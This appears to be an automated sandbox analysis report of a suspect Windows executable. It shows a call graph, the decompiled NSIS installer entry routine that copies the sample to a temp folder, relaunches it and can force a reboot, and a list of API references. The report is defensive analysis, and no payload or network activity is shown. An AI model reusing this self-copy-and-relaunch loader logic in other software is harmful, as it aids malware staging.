4411 402c72 GetTickCount GetModuleFileNameA 4343->4411 4346 403208 11 API calls 4344->4346 4347 4033a6 4346->4347 4347->4343 4350 403424 4347->4350 4496 405b66 lstrcpynA 4348->4496 4349 4033bb 4349->4350 4352 403414 4349->4352 4355 405684 CharNextA 4349->4355 4513 4035bd 4350->4513 4441 4036af 4352->4441 4357 4033d2 4355->4357 4366 403453 lstrcatA lstrcmpiA 4357->4366 4367 4033ef 4357->4367 4358 403522 4360 4035a5 ExitProcess 4358->4360 4362 405e88 3 API calls 4358->4362 4359 40343d 4361 405427 MessageBoxIndirectA 4359->4361 4364 40344b ExitProcess 4361->4364 4365 403531 4362->4365 4368 405e88 3 API calls 4365->4368 4366->4350 4370 40346f CreateDirectoryA SetCurrentDirectoryA 4366->4370 4497 40573a 4367->4497 4371 40353a 4368->4371 4373 403491 4370->4373 4374 403486 4370->4374 4377 405e88 3 API calls 4371->4377 4523 405b66 lstrcpynA 4373->4523 4522 405b66 lstrcpynA 4374->4522 4379 403543 4377->4379 4381 403591 ExitWindowsEx 4379->4381 4387 403551 GetCurrentProcess 4379->4387 4380 403409 4512 405b66 lstrcpynA 4380->4512 4381->4360 4384 40359e 4381->4384 4383 405b88 18 API calls 4385 4034c1 DeleteFileA 4383->4385 4553 40140b 4384->4553 4388 4034ce CopyFileA 4385->4388 4394 40349f 4385->4394 4389 403561 4387->4389 4388->4394 4389->4381 4390 403516 4391 4058b4 38 API calls 4390->4391 4391->4350 4393 405b88 18 API calls 4393->4394 4394->4383 4394->4390 4394->4393 4396 403502 CloseHandle 4394->4396 4524 4058b4 4394->4524 4550 4053c6 CreateProcessA 4394->4550 4396->4394 4398 405ea4 LoadLibraryA 4397->4398 4399 405eaf GetProcAddress 4397->4399 4398->4399 4400 40327f SHGetFileInfoA 4398->4400 4399->4400 4401 405b66 lstrcpynA 4400->4401 4401->4331 4402->4333 4404 405dc8 5 API calls 4403->4404 4405 403214 4404->4405 4406 40321e 4405->4406 4407 405659 3 API calls 4405->4407 4406->4341 4408 403226 CreateDirectoryA 4407->4408 4409 40586c 2 API calls 4408->4409 4410 40323a 4409->4410 4410->4341 4556 40583d GetFileAttributesA CreateFileA 4411->4556 4413 402cb5 4440 402cc2 4413->4440 4557 405b66 lstrcpynA 4413->4557 4415 402cd8 4558 4056a0 lstrlenA 4415->4558 4419 402ce9 GetFileSize 4420 402dea 4419->4420 4438 402d00 4419->4438 4421 402bd3 33 API calls 4420->4421 4422 402df1 4421->4422 4425 402e2d GlobalAlloc 4422->4425 4422->4440 4564 4031f1 SetFilePointer 4422->4564 4423 4031bf ReadFile 4423->4438 4424 402e85 4427 402bd3 33 API calls 4424->4427 4426 402e44 4425->4426 4430 40586c 2 API calls 4426->4430 4427->4440 4429 402e0e 4431 4031bf ReadFile 4429->4431 4433 402e55 CreateFileA 4430->4433 4434 402e19 4431->4434 4432 402bd3 33 API calls 4432->4438 4435 402e8f 4433->4435 4433->4440 4434->4425 4434->4440 4563 4031f1 SetFilePointer 4435->4563 4437 402e9d 4439 402f18 48 API calls 4437->4439 4438->4420 4438->4423 4438->4424 4438->4432 4438->4440 4439->4440 4440->4349 4442 405e88 3 API calls 4441->4442 4443 4036c3 4442->4443 4444 4036db 4443->4444 4447 4036c9 4443->4447 4445 405a4d 3 API calls 4444->4445 4446 4036fc 4445->4446 4448 40371a lstrcatA 4446->4448 4450 405a4d 3 API calls 4446->4450 4574 405ac4 wsprintfA 4447->4574 4451 4036d9 4448->4451 4450->4448 4565 403978 4451->4565 4454 40573a 18 API calls 4455 40374c 4454->4455 4456 4037d5 4455->4456 4458 405a4d 3 API calls 4455->4458 4457 40573a 18 API calls 4456->4457 4459 4037db 4457->4459 4461 403778 4458->4461 4460 4037eb LoadImageA 4459->4460 4462 405b88 18 API calls 4459->4462 4463 403816 RegisterClassA 4460->4463 4464 40389f 4460->4464 4461->4456 4465 403794 lstrlenA 4461->4465 4469 405684 CharNextA 4461->4469 4462->4460 4466 403852 SystemParametersInfoA CreateWindowExA 4463->4466 4467 4038a9 4463->4467 4468 40140b 2 API calls 4464->4468 4470 4037a2 lstrcmpiA 4465->4470 4471 4037c8 4465->4471 4466->4464 4467->4350 4472 4038a5 4468->4472 4473 403792 4469->4473 4470->4471 4474 4037b2 GetFileAttributesA 4470->4474 4475 405659 3 API calls 4471->4475 4472->4467 4477 403978 19 API calls 4472->4477 4473->4465 4476 4037be 4474->4476 4478 4037ce 4475->4478 4476->4471 4479 4056a0 2 API calls 4476->4479 4480 4038b6 4477->4480 4575 405b66 lstrcpynA 4478->4575 4479->4471 4482 4038c2 ShowWindow LoadLibraryA 4480->4482 4483 403945 4480->4483 4485 4038e1 LoadLibraryA 4482->4485 4486 4038e8 GetClassInfoA 4482->4486 4576 404fd6 OleInitialize 4483->4576 4485->4486 4488 403912 DialogBoxParamA 4486->4488 4489 4038fc GetClassInfoA RegisterClassA 4486->4489 4487 40394b 4491 403967 4487->4491 4492 40394f 4487->4492 4490 40140b 2 API calls 4488->4490 4489->4488 4495 40393a 4490->4495 4493 40140b 2 API calls 4491->4493 4492->4467 4494 40140b 2 API calls 4492->4494 4493->4467 4494->4467 4495->4467 4496->4338 4591 405b66 lstrcpynA 4497->4591 4499 40574b 4500 4056ed 4 API calls 4499->4500 4501 405751 4500->4501 4502 4033fa 4501->4502 4503 405dc8 5 API calls 4501->4503 4502->4350 4511 405b66 lstrcpynA 4502->4511 4509 405761 4503->4509 4504 40578c lstrlenA 4505 405797 4504->4505 4504->4509 4506 405659 3 API calls 4505->4506 4508 40579c GetFileAttributesA 4506->4508 4507 405e61 2 API calls 4507->4509 4508->4502 4509->4502 4509->4504 4509->4507 4510 4056a0 2 API calls 4509->4510 4510->4504 4511->4380 4512->4352 4514 4035d8 4513->4514 4515 4035ce CloseHandle 4513->4515 4516 4035e2 CloseHandle 4514->4516 4517 4035ec 4514->4517 4515->4514 4516->4517 4592 40361a 4517->4592 4522->4373 4523->4394 4525 405e88 3 API calls 4524->4525 4526 4058bf 4525->4526 4527 40591c GetShortPathNameA 4526->4527 4530 405a11 4526->4530 4639 40583d GetFileAttributesA CreateFileA 4526->4639 4529 405931 4527->4529 4527->4530 4529->4530 4532 405939 wsprintfA 4529->4532 4530->4394 4531 405900 CloseHandle GetShortPathNameA 4531->4530 4533 405914 4531->4533 4534 405b88 18 API calls 4532->4534 4533->4527 4533->4530 4535 405961 4534->4535 4640 40583d GetFileAttributesA CreateFileA 4535->4640 4537 40596e 4537->4530 4538 40597d GetFileSize GlobalAlloc 4537->4538 4539 405a0a CloseHandle 4538->4539 4540 40599b ReadFile 4538->4540 4539->4530 4540->4539 4541 4059af 4540->4541 4541->4539 4641 4057b2 lstrlenA 4541->4641 4544 4059c4 4646 405b66 lstrcpynA 4544->4646 4545 405a1e 4546 4057b2 4 API calls 4545->4546 4548 4059d2 4546->4548 4549 4059e5 SetFilePointer WriteFile GlobalFree 4548->4549 4549->4539 4551 405401 4550->4551 4552 4053f5 CloseHandle 4550->4552 4551->4394 4552->4551 4554 401389 2 API calls 4553->4554 4555 401420 4554->4555 4555->4360 4556->4413 4557->4415 4559 4056ad 4558->4559 4560 4056b2 CharPrevA 4559->4560 4561 402cde 4559->4561 4560->4559 4560->4561 4562 405b66 lstrcpynA 4561->4562 4562->4419 4563->4437 4564->4429 4566 40398c 4565->4566 4583 405ac4 wsprintfA 4566->4583 4568 4039fd 4569 405b88 18 API calls 4568->4569 4570 403a09 SetWindowTextA 4569->4570 4571 40372a 4570->4571 4572 403a25 4570->4572 4571->4454 4572->4571 4573 405b88 18 API calls 4572->4573 4573->4572 4574->4451 4575->4456 4584 403f64 4576->4584 4578 404ff9 4582 405020 4578->4582 4587 401389 4578->4587 4579 403f64 SendMessageA 4580 405032 OleUninitialize 4579->4580 4580->4487 4582->4579 4583->4568 4585 403f7c 4584->4585 4586 403f6d SendMessageA 4584->4586 4585->4578 4586->4585 4589 401390 4587->4589 4588 4013fe 4588->4578 4589->4588 4590 4013cb MulDiv SendMessageA 4589->4590 4590->4589 4591->4499 4593 403628 4592->4593 4594 4035f1 4593->4594 4595 40362d FreeLibrary GlobalFree 4593->4595 4596 40548b 4594->4596 4595->4594 4595->4595 4597 40573a 18 API calls 4596->4597 4598 40549f 4597->4598 4599 4054a8 DeleteFileA 4598->4599 4600 4054bf 4598->4600 4601 40342d OleUninitialize 4599->4601 4602 4055fe 4600->4602 4637 405b66 lstrcpynA 4600->4637 4601->4358 4601->4359 4602->4601 4607 405e61 2 API calls 4602->4607 4604 4054e9 4605 4054fa 4604->4605 4606 4054ed lstrcatA 4604->4606 4609 4056a0 2 API calls 4605->4609 4608 405500 4606->4608 4610 405619 4607->4610 4611 40550e lstrcatA 4608->4611 4612 405519 lstrlenA FindFirstFileA 4608->4612 4609->4608 4610->4601 4613 405659 3 API calls 4610->4613 4611->4612 4614 4055f4 4612->4614 4623 40553d 4612->4623 4615 405623 4613->4615 4614->4602 4617 40581e 2 API calls 4615->4617 4616 405684 CharNextA 4616->4623 4618 405629 RemoveDirectoryA 4617->4618 4619 405634 4618->4619 4620 40564b 4618->4620 4619->4601 4625 40563a 4619->4625 4621 404f04 25 API calls 4620->4621 4621->4601 4622 4055d3 FindNextFileA 4622->4623 4626 4055eb FindClose 4622->4626 4623->4616 4623->4622 4630 40581e 2 API calls 4623->4630 4632 40548b 59 API calls 4623->4632 4634 404f04 25 API calls 4623->4634 4635 404f04 25 API calls 4623->4635 4636 4058b4 38 API calls 4623->4636 4638 405b66 lstrcpynA 4623->4638 4627 404f04 25 API calls 4625->4627 4626->4614 4628 405642 4627->4628 4629 4058b4 38 API calls 4628->4629 4633 405649 4629->4633 4631 4055a0 DeleteFileA 4630->4631 4631->4623 4632->4623 4633->4601 4634->4622 4635->4623 4636->4623 4637->4604 4638->4623 4639->4531 4640->4537 4642 4057e8 lstrlenA 4641->4642 4643 4057f2 4642->4643 4644 4057c6 lstrcmpiA 4642->4644 4643->4544 4643->4545 4644->4643 4645 4057df CharNextA 4644->4645 4645->4642 4646->4548 5641 40263e 5642 4029f6 18 API calls 5641->5642 5643 402645 FindFirstFileA 5642->5643 5644 402668 5643->5644 5647 402658 5643->5647 5645 40266f 5644->5645 5649 405ac4 wsprintfA 5644->5649 5650 405b66 lstrcpynA 5645->5650 5649->5645 5650->5647 5651 4024be 5652 4024c3 5651->5652 5653 4024d4 5651->5653 5654 4029d9 18 API calls 5652->5654 5655 4029f6 18 API calls 5653->5655 5657 4024ca 5654->5657 5656 4024db lstrlenA 5655->5656 5656->5657 5658 4024fa WriteFile 5657->5658 5659 40265c 5657->5659 5658->5659

                                                                                                                Executed Functions

                                                                                                                Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 40323c-4032d1 #17 SetErrorMode OleInitialize call 405e88 SHGetFileInfoA call 405b66 GetCommandLineA call 405b66 GetModuleHandleA 7 4032d3-4032d8 0->7 8 4032dd-4032f2 call 405684 CharNextA 0->8 7->8 11 403357-40335b 8->11 12 4032f4-4032f7 11->12 13 40335d 11->13 14 4032f9-4032fd 12->14 15 4032ff-403307 12->15 16 403370-403388 GetTempPathA call 403208 13->16 14->14 14->15 17 403309-40330a 15->17 18 40330f-403312 15->18 26 4033aa-4033c1 DeleteFileA call 402c72 16->26 27 40338a-4033a8 GetWindowsDirectoryA lstrcatA call 403208 16->27 17->18 20 403314-403318 18->20 21 403347-403354 call 405684 18->21 24 403328-40332e 20->24 25 40331a-403323 20->25 21->11 38 403356 21->38 28 403330-403339 24->28 29 40333e-403345 24->29 25->24 32 403325 25->32 39 403428-403437 call 4035bd OleUninitialize 26->39 40 4033c3-4033c9 26->40 27->26 27->39 28->29 35 40333b 28->35 29->21 36 40335f-40336b call 405b66 29->36 32->24 35->29 36->16 38->11 50 403522-403528 39->50 51 40343d-40344d call 405427 ExitProcess 39->51 42 403418-40341f call 4036af 40->42 43 4033cb-4033d4 call 405684 40->43 48 403424 42->48 54 4033df-4033e1 43->54 48->39 52 4035a5-4035ad 50->52 53 40352a-403547 call 405e88 * 3 50->53 57 4035b3-4035b7 ExitProcess 52->57 58 4035af 52->58 82 403591-40359c ExitWindowsEx 53->82 83 403549-40354b 53->83 59 4033e3-4033ed 54->59 60 4033d6-4033dc 54->60 58->57 64 403453-40346d lstrcatA lstrcmpiA 59->64 65 4033ef-4033fc call 40573a 59->65 60->59 63 4033de 60->63 63->54 64->39 68 40346f-403484 CreateDirectoryA SetCurrentDirectoryA 64->68 65->39 76 4033fe-403414 call 405b66 * 2 65->76 71 403491-4034ab call 405b66 68->71 72 403486-40348c call 405b66 68->72 81 4034b0-4034cc call 405b88 DeleteFileA 71->81 72->71 76->42 92 40350d-403514 81->92 93 4034ce-4034de CopyFileA 81->93 82->52 86 40359e-4035a0 call 40140b 82->86 83->82 87 40354d-40354f 83->87 86->52 87->82 91 403551-403563 GetCurrentProcess 87->91 91->82 97 403565-403587 91->97 92->81 95 403516-40351d call 4058b4 92->95 93->92 96 4034e0-403500 call 4058b4 call 405b88 call 4053c6 93->96 95->39 96->92 107 403502-403509 CloseHandle 96->107 97->82 107->92
                                                                                                                C-Code - Quality: 82%
                                                                                                                			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\hardz\\Desktop\\UGGJ4NnzFz.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\hardz\\Desktop\\UGGJ4NnzFz.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44 + 2);
								L20:
								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403208(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C72(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035BD();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34;
											if( *0x423f34 != 0) {
												_t106 = E00405E88(3);
												_t100 = E00405E88(4);
												_t55 = E00405E88(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405427(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x423ebc == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004036AF();
										goto L32;
									}
									_t103 = E00405684(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
										}
										E00405B66(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x120)));
											DeleteFileA(0x41f058);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\UGGJ4NnzFz.exe", 0x41f058, 1) != 0) {
												_push(0);
												_push(0x41f058);
												E004058B4();
												E00405B88(0, _t98, 0x41f058, 0x41f058,  *((intOrPtr*)( *0x423eb0 + 0x124)));
												_t79 = E004053C6(0x41f058);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004058B4();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E0040573A(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403208(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                                                                                                                0x00403248
                                                                                                                0x0040324c
                                                                                                                0x00403254
                                                                                                                0x00403256
                                                                                                                0x0040325b
                                                                                                                0x00403266
                                                                                                                0x0040326d
                                                                                                                0x00403275
                                                                                                                0x0040327f
                                                                                                                0x00403295
                                                                                                                0x004032a5
                                                                                                                0x004032aa
                                                                                                                0x004032b0
                                                                                                                0x004032b7
                                                                                                                0x004032ca
                                                                                                                0x004032cf
                                                                                                                0x004032d1
                                                                                                                0x004032d3
                                                                                                                0x004032d8
                                                                                                                0x004032d8
                                                                                                                0x004032e8
                                                                                                                0x004032ee
                                                                                                                0x00403357
                                                                                                                0x00403357
                                                                                                                0x00403359
                                                                                                                0x0040335b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004032f4
                                                                                                                0x004032f7
                                                                                                                0x004032ff
                                                                                                                0x004032ff
                                                                                                                0x00403302
                                                                                                                0x00403307
                                                                                                                0x00403309
                                                                                                                0x00403309
                                                                                                                0x0040330a
                                                                                                                0x0040330a
                                                                                                                0x0040330f
                                                                                                                0x00403312
                                                                                                                0x00403347
                                                                                                                0x0040334c
                                                                                                                0x00403351
                                                                                                                0x00403354
                                                                                                                0x00403356
                                                                                                                0x00403356
                                                                                                                0x00403356
                                                                                                                0x00000000
                                                                                                                0x00403314
                                                                                                                0x00403314
                                                                                                                0x00403315
                                                                                                                0x00403318
                                                                                                                0x00403320
                                                                                                                0x00403323
                                                                                                                0x00403325
                                                                                                                0x00403325
                                                                                                                0x00403325
                                                                                                                0x00403323
                                                                                                                0x00403328
                                                                                                                0x0040332e
                                                                                                                0x00403336
                                                                                                                0x00403339
                                                                                                                0x0040333b
                                                                                                                0x0040333b
                                                                                                                0x0040333b
                                                                                                                0x00403339
                                                                                                                0x0040333e
                                                                                                                0x00403345
                                                                                                                0x0040335f
                                                                                                                0x00403362
                                                                                                                0x0040336b
                                                                                                                0x00403370
                                                                                                                0x00403370
                                                                                                                0x0040337b
                                                                                                                0x00403381
                                                                                                                0x00403386
                                                                                                                0x00403388
                                                                                                                0x004033aa
                                                                                                                0x004033af
                                                                                                                0x004033b6
                                                                                                                0x004033bd
                                                                                                                0x004033c1
                                                                                                                0x00403428
                                                                                                                0x00403428
                                                                                                                0x0040342d
                                                                                                                0x00403437
                                                                                                                0x00403522
                                                                                                                0x00403528
                                                                                                                0x00403533
                                                                                                                0x0040353c
                                                                                                                0x0040353e
                                                                                                                0x00403543
                                                                                                                0x00403545
                                                                                                                0x00403547
                                                                                                                0x00403549
                                                                                                                0x0040354b
                                                                                                                0x0040354d
                                                                                                                0x0040354f
                                                                                                                0x0040355f
                                                                                                                0x00403561
                                                                                                                0x00403563
                                                                                                                0x00403570
                                                                                                                0x0040357f
                                                                                                                0x00403587
                                                                                                                0x0040358f
                                                                                                                0x0040358f
                                                                                                                0x00403563
                                                                                                                0x0040354f
                                                                                                                0x0040354b
                                                                                                                0x00403594
                                                                                                                0x0040359a
                                                                                                                0x0040359c
                                                                                                                0x004035a0
                                                                                                                0x004035a0
                                                                                                                0x0040359c
                                                                                                                0x004035a5
                                                                                                                0x004035aa
                                                                                                                0x004035ad
                                                                                                                0x004035af
                                                                                                                0x004035af
                                                                                                                0x004035b7
                                                                                                                0x004035b7
                                                                                                                0x00403446
                                                                                                                0x0040344d
                                                                                                                0x0040344d
                                                                                                                0x004033c9
                                                                                                                0x00403418
                                                                                                                0x00403418
                                                                                                                0x00403424
                                                                                                                0x00000000
                                                                                                                0x00403424
                                                                                                                0x004033d2
                                                                                                                0x004033df
                                                                                                                0x004033d6
                                                                                                                0x004033dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004033de
                                                                                                                0x004033de
                                                                                                                0x004033de
                                                                                                                0x004033e3
                                                                                                                0x004033e5
                                                                                                                0x004033ed
                                                                                                                0x00403459
                                                                                                                0x0040346d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403471
                                                                                                                0x00403478
                                                                                                                0x0040347e
                                                                                                                0x00403484
                                                                                                                0x0040348c
                                                                                                                0x0040348c
                                                                                                                0x0040349a
                                                                                                                0x004034a1
                                                                                                                0x004034aa
                                                                                                                0x004034b0
                                                                                                                0x004034bc
                                                                                                                0x004034c2
                                                                                                                0x004034cc
                                                                                                                0x004034e0
                                                                                                                0x004034e1
                                                                                                                0x004034e2
                                                                                                                0x004034f3
                                                                                                                0x004034f9
                                                                                                                0x00403500
                                                                                                                0x00403503
                                                                                                                0x00403509
                                                                                                                0x00403509
                                                                                                                0x00403500
                                                                                                                0x0040350d
                                                                                                                0x00403513
                                                                                                                0x00403513
                                                                                                                0x00403516
                                                                                                                0x00403517
                                                                                                                0x00403518
                                                                                                                0x00000000
                                                                                                                0x00403518
                                                                                                                0x004033ef
                                                                                                                0x004033f1
                                                                                                                0x004033fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403404
                                                                                                                0x0040340f
                                                                                                                0x00403414
                                                                                                                0x00000000
                                                                                                                0x00403414
                                                                                                                0x00403390
                                                                                                                0x0040339c
                                                                                                                0x004033a1
                                                                                                                0x004033a6
                                                                                                                0x004033a8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004033a8
                                                                                                                0x00000000
                                                                                                                0x00403345
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004032f9
                                                                                                                0x004032f9
                                                                                                                0x004032f9
                                                                                                                0x004032fa
                                                                                                                0x004032fa
                                                                                                                0x00000000
                                                                                                                0x004032f9
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • #17.COMCTL32 ref: 0040325B
                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                                                  • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                  • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                  • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                • SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295
                                                                                                                  • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                                • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,00000000), ref: 004032BD
                                                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,00000020), ref: 004032E8
                                                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                                                • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                                                • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                                                • ExitProcess.KERNEL32 ref: 0040344D
                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,00000000,00000000), ref: 00403459
                                                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,00000000,00000000), ref: 00403465
                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                                                • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\UGGJ4NnzFz.exe,0041F058,00000001), ref: 004034D6
                                                                                                                • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                                                • ExitProcess.KERNEL32 ref: 004035B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
